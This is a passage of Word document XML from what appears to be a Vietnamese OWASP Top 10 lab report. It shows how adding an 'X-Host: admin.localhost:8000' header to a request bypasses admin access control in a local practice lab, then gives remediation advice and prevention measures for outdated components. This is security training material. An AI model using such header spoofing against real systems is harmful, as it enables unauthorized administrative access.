        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0400">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t>Thêm trường X-Host vào phần reques và gửi request lên server để có thể truy cập vào quyền admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3F961E" w14:textId="77777777" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A56779D" w14:textId="09914781" w:rsidR="009D0400" w:rsidRPr="008F6347" w:rsidRDefault="008F6347" w:rsidP="008F6347">
      <w:r w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="008F6347">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="008F6347">
        <w:t>ruy cập và task và thực hiện lấy key nhưng nhận thấy rằng không được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1237A3F8" w14:textId="77777777" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="003F37D4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D54AD82" wp14:editId="04911DF6">
            <wp:extent cx="6115050" cy="2761615"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1686544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44485" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2761615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9A2414" w14:textId="5A30AEFC" w:rsidR="009D0400" w:rsidRPr="008F6347" w:rsidRDefault="008F6347" w:rsidP="008F6347">
      <w:r w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="008F6347">
        <w:t xml:space="preserve"> Theo như nhận thấy từ bước 1, tiến hành thêm trường:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6366FBF0" w14:textId="77777777" w:rsidR="009D0400" w:rsidRPr="00DD0943" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="00DD0943">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>X-Host: admin.localhost:8000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DC1CF4" w14:textId="77777777" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="00E747C9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E370FA7" wp14:editId="316056BB">
            <wp:extent cx="6115050" cy="2301875"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1037139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39260" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2301875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="174F6C4C" w14:textId="57F952AA" w:rsidR="009D0400" w:rsidRPr="00DD0943" w:rsidRDefault="008F6347" w:rsidP="009D0400">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="008F6347">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="008F6347">
        <w:t>hực hiện lại</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00DD0943">
        <w:t xml:space="preserve"> thì thành công và ta có được key: </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00CD7FBE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S3CR37K3Y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6EB29F" w14:textId="1181574D" w:rsidR="009D0400" w:rsidRPr="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="00E747C9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57EC0E56" wp14:editId="15EEE13F">
            <wp:extent cx="6115050" cy="2752090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="803998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98604" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2752090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD450F8" w14:textId="1D12604C" w:rsidR="009D0400" w:rsidRPr="008F6347" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidR="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F6347" w:rsidRPr="008F6347">
        <w:t>High (cao) vì l</w:t>
      </w:r>
      <w:r w:rsidR="001F070A" w:rsidRPr="008F6347">
        <w:t>ỗ hổng này cho phép truy cập trái phép vào quyền admin chỉ bằng cách thay đổi trường HTTP header, gây nguy cơ mất kiểm soát truy cập và rò rỉ thông tin nhạy cảm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6CAF86" w14:textId="77777777" w:rsidR="002F50C5" w:rsidRDefault="009D0400" w:rsidP="002F50C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r w:rsidR="002F50C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDBCDCA" w14:textId="51259EBB" w:rsidR="002F50C5" w:rsidRPr="008F6347" w:rsidRDefault="002F50C5" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Thiết kế quy trình phát triển an toàn và </w:t>
      </w:r>
      <w:r w:rsidR="008F6347" w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">iệu quả: </w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t>Tạo ra một quy trình phát triển chặt chẽ và tự động hóa để đảm bảo rằng mọi bước trong quy trình đều tuân thủ các tiêu chuẩn an toàn và hiệu quả.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64728C28" w14:textId="0458E92C" w:rsidR="002F50C5" w:rsidRPr="008F6347" w:rsidRDefault="002F50C5" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Loại bỏ thành phần dư thừa và lọc repeater:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t xml:space="preserve"> Đảm bảo rằng không có thành phần dư thừa nào trong quá trình gọi truy vấn hoặc lọc repeater, điều này giúp giảm thiểu nguy cơ về lỗ hổng bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1977C934" w14:textId="2B474147" w:rsidR="002F50C5" w:rsidRPr="008F6347" w:rsidRDefault="002F50C5" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F6347">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cập nhật liên tục và sử dụng phiên bản mới nhất trong bảo mật:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6347">
        <w:t xml:space="preserve"> Luôn duy trì cập nhật và sử dụng phiên bản mới nhất của các thư viện và framework trong hệ thống, đặc biệt là khi có các bản vá bảo mật mới phát hành.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4E0B13" w14:textId="77777777" w:rsidR="00B528F8" w:rsidRDefault="00B528F8">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22068287" w14:textId="0EB0BCF7" w:rsidR="00151DDF" w:rsidRPr="00955E98" w:rsidRDefault="00151DDF" w:rsidP="007C62EC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc182909851"/>
      <w:r w:rsidRPr="00955E98">
        <w:lastRenderedPageBreak/>
        <w:t>A06:2021 – Vulnerable and Outdated Components</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="42BE437D" w14:textId="41CAC7B4" w:rsidR="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc182909852"/>
      <w:r w:rsidRPr="00151DDF">
        <w:t>Mô tả lỗ hổng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="43A3A2F2" w14:textId="75088A45" w:rsidR="002A3AFF" w:rsidRPr="00C64320" w:rsidRDefault="00C64320" w:rsidP="00C64320">
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00C64320">
        <w:t>Thành phần phần mềm là một phần của hệ thống hoặc ứng dụng giúp mở rộng chức năng của nó, chẳng hạn nh</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00C64320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> mô đun, gói phần mềm hoặc API. Các lỗ hổng dựa trên thành phần xảy ra khi một thành phần không đ</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00C64320">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="002A3AFF" w:rsidRPr="00C64320">
        <w:t>ợc hỗ trợ, lỗi thời hoặc có lỗ hổng bị khai thác đã biết.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A61F61" w14:textId="514D1C2C" w:rsidR="00737BC7" w:rsidRDefault="00737BC7" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc182909853"/>
      <w:r>
        <w:t xml:space="preserve">Biện pháp </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26">
        <w:t>ngăn chặn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="5321E05D" w14:textId="6C2E8F21" w:rsidR="00737BC7" w:rsidRPr="00C64320" w:rsidRDefault="00737BC7" w:rsidP="00C64320">
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Xóa tất cả các phụ thuộc không cần thiết</w:t>
      </w:r>
      <w:r w:rsidR="00AC7181" w:rsidRPr="00C64320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> Một trang web WordPress chỉ cần sử dụng các plugin cần thiết cho chức năng cụ thể và loại bỏ những plugin không sử dụng. </w:t>
      </w:r>
      <w:r w:rsidR="00AC7181" w:rsidRPr="00C64320">
        <w:t>Việc l</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve">oại bỏ các plugin, </w:t>
      </w:r>
      <w:r w:rsidR="00AC7181" w:rsidRPr="00C64320">
        <w:t xml:space="preserve">thư viện </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve">hoặc tiện ích mở rộng không cần thiết </w:t>
      </w:r>
      <w:r w:rsidR="00AC7181" w:rsidRPr="00C64320">
        <w:t xml:space="preserve">sẽ </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t>giảm thiểu bề mặt tấn công</w:t>
      </w:r>
      <w:r w:rsidR="00AC7181" w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> và nguy cơ bảo mật</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A942F3" w14:textId="37D11F75" w:rsidR="00737BC7" w:rsidRPr="00C64320" w:rsidRDefault="00AC7181" w:rsidP="00C64320">
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00737BC7" w:rsidRPr="00C64320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Giữ một danh sách các thành phần cả phía client và server</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> Duy trì một bảng theo dõi toàn bộ các plugin và thư viện đang sử dụng trong ứng dụng web. Nếu </w:t>
      </w:r>
      <w:r w:rsidR="00C64320" w:rsidRPr="00C64320">
        <w:t xml:space="preserve">như đang </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve">sử dụng một thư viện JavaScript cho giao diện người dùng thì </w:t>
      </w:r>
      <w:r w:rsidR="00C64320" w:rsidRPr="00C64320">
        <w:t xml:space="preserve">cần </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve">liệt kê </w:t>
      </w:r>
      <w:r w:rsidR="00C64320" w:rsidRPr="00C64320">
        <w:t xml:space="preserve">các </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve">phiên bản và kiểm tra xem có bản cập nhật nào mới không. Điều này giúp </w:t>
      </w:r>
      <w:r w:rsidR="00C64320" w:rsidRPr="00C64320">
        <w:t xml:space="preserve">chúng </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t>ta biết chính xác thành phần nào đang được sử dụng và khi nào cần cập nhật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7025C2" w14:textId="5015DB8E" w:rsidR="00AC7181" w:rsidRPr="00C64320" w:rsidRDefault="00AC7181" w:rsidP="00C64320">
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Theo dõi các nguồn thông tin về lỗ hổng như CVE và NVD.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> Đăng ký nhận thông báo từ các cơ sở dữ liệu lỗ hổng như Common Vulnerabilities and Exposures (CVE) và National Vulnerability Database (NVD). Nếu thấy rằng một phiên bản của một thư viện đang sử dụng có lỗ hổng bảo mật,</w:t>
      </w:r>
      <w:r w:rsidR="00C64320">
        <w:t xml:space="preserve"> chúng</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> ta có thể cập nhật hoặc thay thế thành phần đó kịp thời.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A082C30" w14:textId="2DD2C7B6" w:rsidR="00AC7181" w:rsidRPr="00C64320" w:rsidRDefault="00AC7181" w:rsidP="00C64320">
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Quét trang web bằng công cụ kiểm tra bảo mật.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> Sử dụng công cụ quét bảo mật như WPScan để kiểm tra các lỗ hổng bảo mật trong trang web WordPress của </w:t>
      </w:r>
      <w:r w:rsidR="00C64320" w:rsidRPr="00C64320">
        <w:t xml:space="preserve">chúng ta. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve">Nếu công cụ phát hiện rằng một plugin cụ thể có lỗ hổng đã biết, </w:t>
      </w:r>
      <w:r w:rsidR="00C64320" w:rsidRPr="00C64320">
        <w:t xml:space="preserve">chúng </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t>ta có thể tiến hành cập nhật hoặc thay thế plugin đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC0D292" w14:textId="67DBF3EF" w:rsidR="00AC7181" w:rsidRPr="00C64320" w:rsidRDefault="00AC7181" w:rsidP="00C64320">
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- Chỉ lấy các thành phần từ các nguồn chính thức</w:t>
      </w:r>
      <w:r w:rsidR="00C64320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> và uy tín</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> Khi cài đặt các thành phần như plugin hoặc thư viện, chỉ tải chúng từ các trang web chính thức hoặc kho lưu trữ chính thức như WordPress Plugin Directory hoặc GitHub. Tránh tải các thành phần từ nguồn không xác định hoặc không đáng tin cậy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BF3FFE" w14:textId="67B79226" w:rsidR="00737BC7" w:rsidRPr="00C64320" w:rsidRDefault="00AC7181" w:rsidP="00C64320">
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Xóa các thành phần không được duy trì.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> Nếu </w:t>
      </w:r>
      <w:r w:rsidR="00C64320" w:rsidRPr="00C64320">
        <w:t xml:space="preserve">chúng </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t>ta đang sử dụng một plugin mà nhà phát triển không còn cập nhật và không còn được hỗ trợ</w:t>
      </w:r>
      <w:r w:rsidR="00C64320" w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> nữa</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C64320" w:rsidRPr="00C64320">
        <w:t xml:space="preserve">hãy </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t>gỡ bỏ plugin đó và tìm một giải pháp thay thế được duy trì và cập nhật thường xuyên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554DE328" w14:textId="2972982E" w:rsidR="00AC7181" w:rsidRPr="00C64320" w:rsidRDefault="00AC7181" w:rsidP="00C64320">
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Sử dụng vá ảo với sự hỗ trợ của Website Application Firewall (WAF).</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve"> Nếu </w:t>
      </w:r>
      <w:r w:rsidR="00C64320" w:rsidRPr="00C64320">
        <w:t xml:space="preserve">như </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t xml:space="preserve">không thể cập nhật một thành phần bị lỗi thời ngay lập tức, sử dụng một tường lửa ứng dụng web như Cloudflare hoặc Sucuri để chặn các cuộc tấn công khai thác các lỗ hổng đó. Điều này cung cấp một lớp bảo vệ bổ sung cho trang web cho đến khi </w:t>
      </w:r>
      <w:r w:rsidR="00C64320" w:rsidRPr="00C64320">
        <w:t xml:space="preserve">chúng </w:t>
      </w:r>
      <w:r w:rsidR="00BD0662" w:rsidRPr="00C64320">
        <w:t xml:space="preserve">ta </w:t>
      </w:r>
      <w:r w:rsidRPr="00C64320">
        <w:t>có thể cập nhật thành phần.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182FD938" w14:textId="47871186" w:rsidR="00151DDF" w:rsidRPr="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc182909854"/>
      <w:r w:rsidRPr="00151DDF">
        <w:t>Kịch bản tấn công thực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="38FAFC28" w14:textId="36BC66F8" w:rsidR="00031203" w:rsidRDefault="00031203" w:rsidP="00031203">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc182909855"/>
      <w:r w:rsidRPr="00031203">
        <w:t>Bài thực hành – Lab 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="31C157D7" w14:textId="0F91BAAB" w:rsidR="004E0865" w:rsidRDefault="004E0865" w:rsidP="004E0865">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0865">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào: </w:t>
      </w:r>
      <w:hyperlink r:id="rId75" w:history="1">
        <w:r w:rsidRPr="00EF59B8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/a9_lab</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13B114C0" w14:textId="6F6C3222" w:rsidR="002F50C5" w:rsidRPr="009D0400" w:rsidRDefault="002F50C5" w:rsidP="002F50C5">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00C64320">
        <w:t>Vulnerable and Outdated Components</w:t>
      </w:r>
      <w:r w:rsidR="004E0865">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8A5003" w14:textId="2F2575B1" w:rsidR="002F50C5" w:rsidRPr="00C64320" w:rsidRDefault="002F50C5" w:rsidP="002F50C5">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidR="00931C64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00931C64" w:rsidRPr="00C64320">
